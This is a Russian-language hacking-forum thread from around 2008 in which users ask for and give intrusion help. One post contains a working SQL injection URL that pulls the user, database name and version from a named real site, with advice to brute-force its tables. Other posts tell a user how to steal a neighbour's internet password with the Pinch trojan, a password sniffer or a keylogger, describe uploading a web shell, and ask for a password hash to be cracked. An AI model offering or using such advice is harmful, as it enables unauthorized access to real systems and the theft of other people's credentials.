Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. F1shka

    F1shka Elder - Старейшина

    Joined:
    10 Apr 2008
    Messages:
    173
    Likes Received:
    305
    Reputations:
    3
    По конкретней сударь!
     
  2. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    1значение переменной вообще может не фигурировать в запросе, что общего между:
    и
    2 и это не обязательно лимит, например where lala=1,-20,10


    :add sql inj здесь не прокатит
     
    1 person likes this.
  3. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Так,активировал телнет серв на компе.При коннекти по 3389-ому порту выдаёт следующее:

    Вход в систему невозможен из-за ограничений учётной записи

    Каких ограничений ? =_=.Проверку делал,когда чел был в логоффе и в онлайне.Фаир и антивирь отключен,ибо это точно не из-за них.
     
  4. 777DEMYAN777

    777DEMYAN777 Elder - Старейшина

    Joined:
    31 May 2008
    Messages:
    48
    Likes Received:
    12
    Reputations:
    0
    У меня с моим соседом стоит сетка через хаб, и у него безлимитка, хочу узнать его логи и пасс на инет
     
  5. IND1G0

    IND1G0 New Member

    Joined:
    21 Sep 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Всеи спасибо, разобрался...
     
    1 person likes this.
  6. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Gema
    ktools.net/forum - есть форум но видемо база другая..

    777DEMYAN777
    приди к нему домой... мол фильмы посмотреть, пока он ушел делать чай.. закинь password recovery.. или того же самого пинча подкинь...

    DJ ][akep
    логический вывод 4 версия... можешь не продолжать )
     
    #3346 sabe, 26 Sep 2008
    Last edited: 26 Sep 2008
  7. Gema

    Gema Member

    Joined:
    18 Sep 2008
    Messages:
    0
    Likes Received:
    16
    Reputations:
    0
    У кого-нибудь есть соображения?
     
    3 people like this.
  8. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Code:
    http://ktools.net/news_detail.php?nid=1+union+select+1,2,concat_ws(0x40,user(),database(),version()),4,5--
    Бруть таблицы ..SIPT'ом например
     
  9. luz3r

    luz3r Banned

    Joined:
    23 Feb 2008
    Messages:
    119
    Likes Received:
    250
    Reputations:
    -11
    используй локальный снифер.
     
  10. 777DEMYAN777

    777DEMYAN777 Elder - Старейшина

    Joined:
    31 May 2008
    Messages:
    48
    Likes Received:
    12
    Reputations:
    0
    Дай пожалуйста ссылку на его
     
  11. luz3r

    luz3r Banned

    Joined:
    23 Feb 2008
    Messages:
    119
    Likes Received:
    250
    Reputations:
    -11
    Шпионская программа для платформы Windows, предназначенная для перехвата паролей в локальной сети. Программа умеет прослушивать Сеть и позволяет захватывать пароли любого сетевого пользователя через FTP, POP3, HTTP, SMTP, Telnet протоколы. Ace Password Sniffer при работе не создаёт никакого трафика в сети, поэтому Вы не будете обнаружены другими пользователями сети..

    Скачать тут .

    Пробуй...
     
  12. 777DEMYAN777

    777DEMYAN777 Elder - Старейшина

    Joined:
    31 May 2008
    Messages:
    48
    Likes Received:
    12
    Reputations:
    0
    с этого обменника нельзя почему то скачать, другую ссылочку пожалуйста дай
     
  13. luz3r

    luz3r Banned

    Joined:
    23 Feb 2008
    Messages:
    119
    Likes Received:
    250
    Reputations:
    -11
  14. 777DEMYAN777

    777DEMYAN777 Elder - Старейшина

    Joined:
    31 May 2008
    Messages:
    48
    Likes Received:
    12
    Reputations:
    0
    Спасибо, скачал, только что надо делать чтобы получить пассы?
     
  15. luz3r

    luz3r Banned

    Joined:
    23 Feb 2008
    Messages:
    119
    Likes Received:
    250
    Reputations:
    -11
    запусти прогу и попроси своего друга зайти в инет и скачать что нить..
     
    1 person likes this.
  16. FAPSI

    FAPSI Banned

    Joined:
    18 Sep 2008
    Messages:
    20
    Likes Received:
    3
    Reputations:
    0
    Мужики, нарыл на одном сайте скрипт filemanager.php , дает залить на сервак файл (шелл), но хоть убей не могу найти куда он его льет. Примерная структура сайта есть..
    Не хочу светить сайт - с помощью прошу в л/с
     
  17. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    Доброе время суток,кто подскажет,что за шифрование?
    *a1909ea3a9dbd4bb8713d01188e5da99f971817f
    и если можно,то и пасс нехэшированный
     
  18. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Это mysql или SHA1 хеш. Отличить их нельзя так как одинаковы по формату, но обычно эта звёздочка впереди обозначает что это все же мускульный хеш (MySQL_160bit)
     
    1 person likes this.
  19. 777DEMYAN777

    777DEMYAN777 Elder - Старейшина

    Joined:
    31 May 2008
    Messages:
    48
    Likes Received:
    12
    Reputations:
    0
    Помогите!!! Имею полный доступ к компу, как вытянуть пароли на инет с него, если юзер их не сохраняет
     
  20. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    кейлогер
     
Thread Status:
Not open for further replies.